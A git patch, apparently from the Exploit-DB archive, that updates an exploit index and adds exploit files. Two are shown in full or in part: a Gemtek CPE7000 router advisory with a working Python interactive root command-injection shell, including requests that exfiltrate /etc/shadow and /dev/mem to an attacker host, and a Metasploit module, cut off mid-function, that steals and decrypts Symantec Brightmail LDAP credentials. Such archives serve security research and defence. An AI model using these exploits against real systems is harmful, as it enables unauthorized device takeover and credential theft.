From 22a4c5d4ccb84bd2ebd53bddc66ca42e113317d0 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 22 Apr 2016 05:03:45 +0000
Subject: [PATCH] DB: 2016-04-22

5 new exploits

freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability

FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution

FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution

FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities
FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities

FreePBX config.php Remote Code Execution
FreePBX - config.php Remote Code Execution
FreePBX 2.5.2 admin/config.php tech Parameter XSS
FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS
FreePBX 2.5.2 - admin/config.php tech Parameter XSS
FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities
Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure
Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities
Linux/x86_64 - bindshell (Port 5600) - 86 bytes
Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)
---
 files.csv                              |  19 +-
 platforms/hardware/webapps/39716.py    | 227 ++++++++
 platforms/java/webapps/39715.rb        | 308 ++++++++++
 platforms/lin_x86-64/shellcode/39718.c |  88 +++
 platforms/php/webapps/39714.txt        | 767 +++++++++++++++++++++++++
 platforms/windows/local/39719.ps1      | 372 ++++++++++++
 6 files changed, 1774 insertions(+), 7 deletions(-)
 create mode 100755 platforms/hardware/webapps/39716.py
 create mode 100755 platforms/java/webapps/39715.rb
 create mode 100755 platforms/lin_x86-64/shellcode/39718.c
 create mode 100755 platforms/php/webapps/39714.txt
 create mode 100755 platforms/windows/local/39719.ps1

diff --git a/files.csv b/files.csv
index 438933d0a..909462bd5 100755
--- a/files.csv
+++ b/files.csv
@@ -2355,7 +2355,7 @@ id,file,description,date,author,platform,type,port
 2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0
 2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0
 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0
-2665,platforms/php/webapps/2665.txt,"freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
+2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability",2006-10-28,"Mehmet Ince",php,webapps,0
 2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0
@@ -13155,7 +13155,7 @@ id,file,description,date,author,platform,type,port
 15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0
 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
-15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
+15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute Vulnerability",2010-09-26,Abysssec,php,webapps,0
 15102,platforms/win32/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win32,webapps,80
 15103,platforms/windows/dos/15103.py,"VMware Workstation <= 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
@@ -16169,7 +16169,7 @@ id,file,description,date,author,platform,type,port
 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
 18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0
-18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
+18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0
 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0
 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0
 18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0
@@ -26981,7 +26981,7 @@ id,file,description,date,author,platform,type,port
 29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
 29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0
 29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0
-29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
+29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.PHP Remote File Include Vulnerability",2007-04-20,Omni,php,webapps,0
 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service Vulnerability",2007-04-21,"Levent Kayan",multiple,dos,0
 29876,platforms/php/webapps/29876.txt,"TJSChat 0.95 You.PHP Cross-Site Scripting Vulnerability",2007-04-23,the_Edit0r,php,webapps,0
@@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port
 32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
 32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
-32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
+32512,platforms/unix/remote/32512.rb,"FreePBX - config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0
 32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0
 32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0
 32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0
@@ -30153,8 +30153,8 @@ id,file,description,date,author,platform,type,port
 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting Vulnerability",2009-12-24,"Steven Abbagnaro",php,webapps,0
 33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Include Vulnerability",2009-12-29,F10riX,php,webapps,0
 33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-12-28,MustLive,php,webapps,0
-33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
-33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
+33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
+33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0
 33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0
 33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 - 'admin.php' Cross-Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0
 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@@ -35931,3 +35931,8 @@ id,file,description,date,author,platform,type,port
 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
 39712,platforms/win64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win64,dos,0
 39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0
+39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80
+39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443
+39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
+39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
diff --git a/platforms/hardware/webapps/39716.py b/platforms/hardware/webapps/39716.py
new file mode 100755
index 000000000..0b8b53f12
--- /dev/null
+++ b/platforms/hardware/webapps/39716.py
@@ -0,0 +1,227 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
+# Date: 04/06/2016
+# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
+# Vendor Homepage: gemtek.com.tw
+# Version: Firmware Version 01.01.02.082
+# Tested on: 
+# Product Name : CPE7000
+# Model ID : WLTCS-106
+# Hardware Version : V02A
+# Firmware Version : 01.01.02.082
+
+1) SID leak / auth bypass
+The sysconfg cgi application leaks a valid "SID" (session id) when the
+following unauthenticated request is made:
+Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1
+
+The response body has the form: <checkcode>,<sid>
+Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ
+
+The sid thus obtained can be used to "unlock" the cliend-side administration
+interface and/or to directly issue request that are usually restricted to
+administrative accounts.
+
+POCs: 
+
+I) Unauthenticated remote reboot:
+Request:
+/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>
+
+II) Web admin interface access. Add a new cookie with the following values: 
+userlevel=2
+sid=<sid>
+
+--------------------------------------------------------------------------------
+
+2) Arbitrary file download - with root privileges - via iperf tool
+One of the diagnostic tools available on the device can be used to read an
+arbitrary file on the device. The sysconfg cgi application fails to sanitize
+user input, allowing an attacker to hijack the command issued to the "iperf"
+binary, a commonly-used network testing tool that can create TCP and UDP data
+streams and measure the throughput of a network that is carrying them.
+
+The client-side validation can be easily bypassed by changing the javascript
+validation code, or by directly sending a forged request to the server.
+The iperf tool is run with the -c switch, meaning that it is behaving as a
+client that sends data to a server. By adding the -F parameter, iperf is forced
+to read data from a file instead of generating random data to be sent during the
+measurement.
+
+This attack needs 2 step in order to take advantage of the vulnerability.
+The first request sets up the command be to run, the second one (a.k.a. toggle)
+actually runs the command (check the response body, 1 means running, 0 means stopped).
+
+The following "SETUP" request can be used to set the correct parameters:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
+p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
+test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
+perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
+FILE>
+
+Parameters breakdown:
+XXX.XXX.XXX.XXX = attacker ip
+YYYY = attacker listening port
+zz = time limit
+Note: nc is enough to capture data, which may be sent with some additional
+header and footer introduced by iperf's protocol
+
+In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
+
+
+POCs:
+I) download of /etc/shadow
+SETUP REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
+p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
+test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
+erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow
+
+RUN/STOP(Toggle) REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
+
+
+II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
+SETUP REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
+p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
+test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
+&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem
+
+RUN/STOP(Toggle) REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
+
+--------------------------------------------------------------------------------
+
+3) Unauthenticated remote root command execution
+The same vulnerability can be used to issue an arbitrary command on the device.
+The command executed on the system to run the diagnostic tool is constructed
+using the sprintf function and the following format string, with no additional
+checks:
+
+iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
+
+It is therefore possible to insert another command by injecting it in the 
+"perf_measure_server_ip" parameter and commenting out the rest of the original
+command.
+
+To concatenate a command, the string in the first half before the injection
+point ( iperf -c " ) must be correctly closed with quotes ( " ).
+Then the new command can be added, preceded by a semicolon ( ; ).
+Finally, the other part of the original command after the "injection point"
+must be commented out ( # ).
+
+iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
+
+
+SETUP REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
+p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
+ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
+ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1
+
+RUN/STOP(Toggle) REQUEST:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
+
+
+POC (echo test > /www/test):
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
+p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
+&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
+=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
+client_num=1
+
+and toggle:
+/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
+
+--------------------------------------------------------------------------------
+
+Remediation:
+Disable wan access to the management web interface until an updated firmware is released.
+
+More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
+'''
+
+#Gemtek CPE7000 / WLTCS-106 remote root command execution
+#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
+# Tested on: 
+# 		Product Name : 	CPE7000
+#		Model ID : 	WLTCS-106
+#		Hardware Version : 	V02A
+#		Firmware Version : 	01.01.02.082
+
+import httplib
+import ssl
+import urllib
+import time
+import sys
+import getopt
+import socket
+
+ssl._create_default_https_context = ssl._create_unverified_context
+
+host=''
+port = 443
+
+def check():
+	try:
+        	conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
+        	conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1")
+        	r1 = conn.getresponse()
+        	if r1.status != 200:
+			return False
+        	return True
+	except socket.error as msg:
+		print "Cannot connect";
+		sys.exit();
+
+
+def sendcmd( cmd ):
+	resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
+	urlencoded = urllib.quote_plus(resource)
+	cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
+	res = makereq (cmdresource)
+	res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
+	if(res!="1"):
+		res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
+	time.sleep(1)
+	res = makereq ("/cmdoutput.txt")
+	print res
+
+
+def makereq (resource):
+	conn = httplib.HTTPSConnection(host +":"+str(port))
+	conn.request("GET", resource)
+	r1 = conn.getresponse()
+	body = r1.read()
+	return body
+
+
+if len(sys.argv) < 2:
+	print 'GemtekShell.py <host> [<port> (443)]'
+	exit()
+elif len(sys.argv) > 2:
+	port = sys.argv[2]
+
+host = sys.argv[1]
+
+print 'Connecting to ', host, port
+
+if not check() :
+	print "Host seems not vulnerable"
+	sys.exit()
+
+
+while(1):
+	cmd = raw_input("gemtekCMD> ")
+	if cmd.strip() != "quit" :
+		sendcmd(cmd)
+	else :
+		sys.exit()
+	
+
+
+
diff --git a/platforms/java/webapps/39715.rb b/platforms/java/webapps/39715.rb
new file mode 100755
index 000000000..5823e7db0
--- /dev/null
+++ b/platforms/java/webapps/39715.rb
@@ -0,0 +1,308 @@
+# Exploit Title: Symantec Brightmail ldap credential Grabber 
+# Date: 18/04/2016
+# Exploit Author: Fakhir Karim Reda
+# Vendor Homepage: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year&suid=20160418_00
+# Version: 10.6.0-7 and earlier
+# Tested on: Linux, Unox Windows 
+# CVE : CVE-2016-2203
+
+
+#Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway  we can recover the AD #ACOUNT/PASSWORD  
+
+#indeed the html code contains the encrypted AD password.
+
+#the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm:
+
+#public static String decrypt(String password)
+#{
+#byte clearText[];
+#try{
+#PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"{}`~!@#$%^&*()_+-=".toCharArray());
+#SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
+#SecretKey secretKey = keyFactory.generateSecret(keySpec);
+#System.out.println("Encoded key "+ (new String(secretKey.getEncoded())));
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require "base64"
+require 'digest'
+require "openssl"
+
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
+      'Description'    => %q{
+          This module will  grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key.  Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
+
+      },
+      'References'     =>
+        [
+          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
+          ['CVE','2016-2203'],
+          ['BID','86137']
+        ],
+
+      'Author'         =>
+        [
+          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
+        ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 443
+        },
+       'License'        => MSF_LICENSE,
+       'DisclosureDate' => "Dec 17 2015"
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ], self.class)
+    deregister_options('RHOST')
+  end
+
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def report_cred(opts)
+   service_data = {
+    address: opts[:ip],
+    port: opts[:port],
+    service_name: 'LDAP',
+    protocol: 'tcp',
+    workspace_id: myworkspace_id
+   }
+   credential_data = {
+    origin_type: :service,
+    module_fullname: fullname,
+    username: opts[:user],
+    private_data: opts[:password],
+    private_type: :password
+   }.merge(service_data)
+   login_data = {
+    last_attempted_at: DateTime.now,
+    core: create_credential(credential_data),
+    status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    proof: opts[:proof]
+   }.merge(service_data)
+
+   create_credential_login(login_data)
+  end
+
+  def auth(username, password, sid, last_login)
+    # Real JSESSIONID  cookie
+    sid2 = ''
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => '/brightmail/login.do',
+      'headers'   => {
+        'Referer' => "https://#{peer}/brightmail/viewLogin.do",
+        'Connection' => 'keep-alive'
+      },
+      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
+      'vars_post' => {
+        'lastlogin'  => last_login,
+        'userLocale' => '',
+        'lang'       => 'en_US',
+        'username'   => username,
+        'password'   => password,
+        'loginBtn'   => 'Login'
+      }
+    })
+   if res.body =~ /Logged in/
+      sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+      return sid2
+   end
+   if res and res.headers['Location']
+     mlocation = res.headers['Location']
+     new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
+     res = send_request_cgi({
+        'uri'    => new_uri,
+        'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}"
+     })
+     sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+     return sid2  if res and res.body =~ /Logged in/
+   end
+   return false
+  end
+
+  def get_login_data
+    sid        = ''  #From cookie
+    last_login = ''  #A hidden field in the login page
+    res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
+    if res and !res.get_cookies.empty?
+      sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+    end
+    if res
+      last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
+    end
+    return sid, last_login
+  end
+
+  # Returns the status of the listening port.
+  #
+  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
+
+  def port_open?
+    begin
+      res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
+      return true if res
+    rescue ::Rex::ConnectionRefused
+      print_status("#{peer} - Connection refused")
+      return false
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} - Connection failed")
+      return false
+    rescue ::OpenSSL::SSL::SSLError
+      print_error("#{peer} - SSL/TLS connection error")
+      return false
+    end
+  end
+
+  # Returns the derived key from the password, the salt and the iteration count number.
+  #
+  # @return Array of byte containing the derived key.
+  def get_derived_key(password, salt, count)
+    key = password + salt
+    for i in 0..count-1
+        key = Digest::MD5.digest(key)
+    end
+    kl = key.length
+    return key[0,8], key[8,kl]
+  end
+
+
+  # @Return the deciphered password
+  # Algorithm obtained by reversing the firmware
+  #
+  def decrypt(enc_str)
+    pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
+    salt = (Base64.strict_decode64(enc_str[0,12]))
+    remsg = (Base64.strict_decode64(enc_str[12,enc_str.length]))
+    (dk, iv) = get_derived_key(pbe_key, salt, 1000)
+    alg = "des-cbc"
+    decode_cipher = OpenSSL::Cipher::Cipher.new(alg)
+    decode_cipher.decrypt
+    decode_cipher.padding = 0
+    decode_cipher.key = dk
+    decode_cipher.iv = iv
+    plain = decode_cipher.update(remsg)
+    plain << decode_cipher.final
+    return  plain.gsub(/[\x01-\x08]/,'')
+  end
+
+ def grab_auths(sid,last_login)
+  token = '' #from hidden input
+  selected_ldap = '' # from checkbox input
+  new_uri = '' # redirection
+  flow_id = '' # id of the flow
+  folder = '' # symantec folder
+  res = send_request_cgi({
+   'method'    => 'GET',
+   'uri'       => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+   'headers'   => {
+    'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+    'Connection' => 'keep-alive'
+   },
+   'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
+   })
+   if res
+    token = res.body.scan(/<input type="hidden" name="symantec.brightmail.key.TOKEN" value="(.+)"\/>/).flatten[0] || ''
+    selected_ldap = res.body.scan(/<input type="checkbox" value="(.+)" name="selectedLDAP".+\/>/).flatten[0] || ''
+   else
+    return false
+   end
+   res = send_request_cgi({
+    'method'    => 'POST',
+    'uri'       => "/brightmail/setting/ldap/LdapWizardFlow$edit.flo",
+    'headers'   => {
+     'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+     'Connection' => 'keep-alive'
+    },
+    'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
+    'vars_post'  => {
+     'flowId'  => '0',
+     'userLocale' => '',
+     'lang'       => 'en_US',
+     'symantec.brightmail.key.TOKEN'=> "#{token}",
+     'selectedLDAP' => "#{selected_ldap}"
+    }
+   })
+   if res and res.headers['Location']
+    mlocation = res.headers['Location']
+    new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0]
+    flow_id =  new_uri.scan(/.*\?flowId=(.+)/).flatten[0]
+    folder = new_uri.scan(/(.*)\?flowId=.*/).flatten[0]
+   else
+    return false
+   end
+   res = send_request_cgi({
+    'method'    => 'GET',
+    'uri'       => "#{folder}",
+    'headers'   => {
+     'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+     'Connection' => 'keep-alive'
+    },
+    'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
+    'vars_get'  => {
+     'flowId'  => "#{flow_id}",
+     'userLocale' => '',
+     'lang'       => 'en_US'
+    }
+   })
+   if res and res.code == 200
+    login = res.body.scan(/<input type="text" name="userName".*value="(.+)"\/>/).flatten[0] || ''
+    password = res.body.scan(/<input type="password" name="password".*value="(.+)"\/>/).flatten[0] || ''
+    host =  res.body.scan(/<input name="host" id="host" type="text" value="(.+)" class/).flatten[0] || ''
+    port =  res.body.scan(/<input name="port" id="port" type="text" value="(.+)" class/).flatten[0] || ''
+    password = decrypt(password)
+    print_good("Found login = '#{login}' password = '#{password}' host ='#{host}' port = '#{port}' ")
+    report_cred(ip: host, port: port, user:login, password: password, proof: res.code.to_s)
+   end
+  end
+
+  def run_host(ip)
+    return unless port_open?
